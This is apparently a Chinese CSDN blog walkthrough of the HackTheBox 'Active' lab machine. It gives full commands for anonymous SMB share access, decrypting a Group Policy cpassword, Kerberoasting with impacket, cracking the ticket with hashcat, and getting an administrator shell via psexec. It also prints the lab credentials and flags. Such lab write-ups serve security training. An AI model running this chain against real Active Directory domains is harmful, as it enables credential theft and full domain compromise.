hackthebox-Tracks-CREST_CRT-Active

最新推荐文章于 2023-04-17 20:23:16 发布
最新推荐文章于 2023-04-17 20:23:16 发布
阅读量72 收藏
点赞数
分类专栏: hackthebox 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lalalaze/article/details/128954572
版权

靶场IP:10.129.220.218

 

Kerberos在88,netbios-ssn在139,ldap在389和3268。

先从SMB下手使用-L命令列出共享文件夹

带美元符号的是管理员权限,这里我们使用-N符号连接NETLOGON

smbclient -N \\\\10.129.220.218\\NETLOGON

连接Replication

smbclient -N \\\\10.129.220.218\\Replication

 

 

发现active.htb文件夹

在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}

下发现文件

get下载GPT.INI

在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\下发现文件

 

在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\下发现文件

 

在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\下发现文件

 

所有发现的文件

在Groups.xml找到了账号和加密的密码

加密的密码cpassword就是组策略密码GPP

利用gpp-decrypt来进行解密

 

获得密码

GPPstillStandingStrong2k18

使用 SVC_TGS GPPstillStandingStrong2k18 登录SMB

smbclient //10.129.220.218/Users -U SVC_TGS

获取普通用户flag

da252c6fb524db2879c997ad6a0b8a17

从Github下载并安装impacket以使用其python类GetUserSPN.py

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

10.129.220.218 active.htb 添加到HOSTS中

执行命令

python /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.220.218 active.htb/SVC_TGS:GPPstillStandingStrong2k18

使用GetUserSPNs.py Impacket 中的脚本来获取与普通用户帐户关联的服务用户名列表。它还会得到一张可以破解的票。

该脚本识别了一个用户:

Administrator

将hash写入文件

使用hashcat爆破

使用hachcat 确认tgs票据的哈希模式

hashcat -h |grep -i tgs

hashcat -m 13100 -a 0 ./hash.txt ~/Desktop/dic/rockyou.txt --force --show

获得 Administrator 的密码 Ticketmaster1968

getshell

①psexec.py

python /usr/share/doc/python3-impacket/examples/psexec.py administrator@active.htb

获得管理员flag

88fee55365b004ce2a908cde877f7110

②MSF 使用 exploit/windows/smb/psexec 模块

:)--+
关注
专栏目录
t3_Predicting the Markets w ML_sklearn_scatter_PairGrid_R-squared_log returns_Lasso_ridge_KNN_SVM_LR
Linli522362242的专栏
12-03 5672
In the last chapter, we learned how to design trading strategies, create trading signals, and implement advanced concepts, such as seasonality in trading instruments. Understanding those concepts in greater detail is a vast field comprising stochastic...
github里的默认域_渗透基础——域内用户口令策略的获取
weixin_39800112的博客
11-22 290
0x00 前言在域渗透中,我们在口令爆破前需要先获得域内用户的口令策略,以免在口令爆破时锁定用户。站在防御的角度,需要识别出口令爆破的攻击行为并采取防御措施。本文将要介绍获取域内用户口令策略的常用方法,结合利用思路分享检测域用户口令爆破的方法。 0x01 简介本文将要介绍以下内容:· 修改域用户口令策略的方法· 域外获取域用户口令策略的方法· 域内获取域用户口令策略的方法· 检测方法 0...
2003域控服务器报1030/1058错误解决办法
李荣权的专栏--OS--Soft--Life
12-05 3366
域控制器日志报错,事件 1030 和 1058 ,约5分钟一个。——————-事件类型: 错误事件来源: Userenv事件种类: 旼br /> 事件 ID: 1058日期: 2006-5-11事件: 11:39:04用户: NT AUTHORITY/SYSTEM计算机: DC1描述:Windows无法访问 GPOCN={31B2F340-016D-11D2-945F-00C04FB984
Windows Server 2003发生 Userenv 错误事件ID1058、1030
Reiki的专栏
01-03 1万+
症状 在运行 Microsoft Windows Server 2003、Microsoft Windows XP 或 Microsoft Windows 2000 的计算机上,您会遇到以下的一种或多种症状: 组策略设置未应用到计算机。在网络上的域控制器之间进行的组策略复制未完成。无法打开组策略管理单元。例如,无法打开域控制器安全策略管理单元或域安全策略管理单元。尝试打开组策略管理单元
【Apollo7.0】感知模块(3):激光雷达感知中的目标跟踪算法--lidar_obstacle_tracking---multi_target_tracker
yangda_9527的博客
04-17 1782
apollo7.0, 激光雷达感知中的目标跟踪算法。
如何为目标识别追踪项目mikel-brostrom/yolov8_tracking增加计数功能?
专注“目标检测”领域技术分享
02-21 4641
代码的网址项目名:Real-time multi-object tracking and segmentation using Yolov8(1)它的识别和分割是YOLO8完成的。它的多目标追踪是由后面四种算法实现的(botsort,bytetrack,ocsort,strongsort)(2)它这个是实时的Real-time,识别、跟踪、分割的速度很快。
ROS Navigation-----costmap_2d简介
倔强不倒翁的博客
11-30 8697
costmap_2d简介
memory-profiler
既然选择了远方 便只顾风雨兼程 - 永强
08-26 2485
memory-profiler https://pypi.org/project/memory-profiler/ A module for monitoring memory usage of a python program. 用于监视 python 程序的内存使用情况的模块。 1. Memory Profiler This is a python module for monitoring ...
Towards Real-Time Multi-Object Tracking(JDE)
qq_45033722的博客
07-27 2739
JDE
Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_
10-03
标题 "Overpass_for_Magic_Tracks_-_easy_print_magic_3dpstl_" 暗示了这是一个关于3D打印的项目,特别设计用于Magic Tracks,一种可拼接、灵活弯曲的赛车轨道。"3dp"代表3D打印,而"magic 3dpstl"可能是指这个项目...
py-eddy-tracker-master_satphy_python_tracker_tracking_中尺度涡_
10-03
实现对中尺度涡的标注,完成中尺度涡分布的绘图
react-concurrent-mode-typescript-example::shuffle_tracks_button:在TypeScript中使用React并发模式的示例
05-06
:shuffle_tracks_button: React并发模式TypeScript示例 这是一个带有TypeScript的项目示例。 此外,它启用了实验并发模式和暂挂功能,并包括适当的实验类型。 目的是您可以探索和试验新的实验性功能,但可以使用...
MSRX6-20151123214504525_MagStripe_DecodeMagStripe_Tracks_MSRX6_源
09-28
read write erase all 3 tracks for magstripe cards
react-movable::shuffle_tracks_button:拖放您的React列表和表格。 无障碍。 小
02-05
React移动 ! 安装 yarn add react-movable 用法 import * as React from 'react' ; import { List , arrayMove } from 'react-movable' ; const SuperSimple : React .... const [ items , setItems ] = React ....
Faster R-CNN论文翻译——中英文对照
热门推荐
SnailTyan
01-22 4万+
文章作者:Tyan 博客:noahsnail.com  |  CSDN  |  简书 声明:作者翻译论文仅为学习,如有侵权请联系作者删除博文,谢谢! 翻译论文汇总:https://github.com/SnailTyan/deep-learning-papers-translation Faster R-CNN: Towards Real-Time ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8502
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
numexpr-2.8.3-cp38-cp38-win_amd64.whl
最新发布
10-14
numexpr-2.8.3-cp38-cp38-win_amd64.whl
ujson-5.3.0-cp311-cp311-win_amd64.whl
10-14
ujson-5.3.0-cp311-cp311-win_amd64.whl
通过echarts根据hangzhou-tracks.json绘制地图
05-14
然后,需要准备好数据文件hangzhou-tracks.json,该文件包含杭州市的地理信息。最后,可以根据数据文件使用echarts绘制地图。 以下是一个简单的例子: ```html <!DOCTYPE html> <meta charset="utf-8"> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值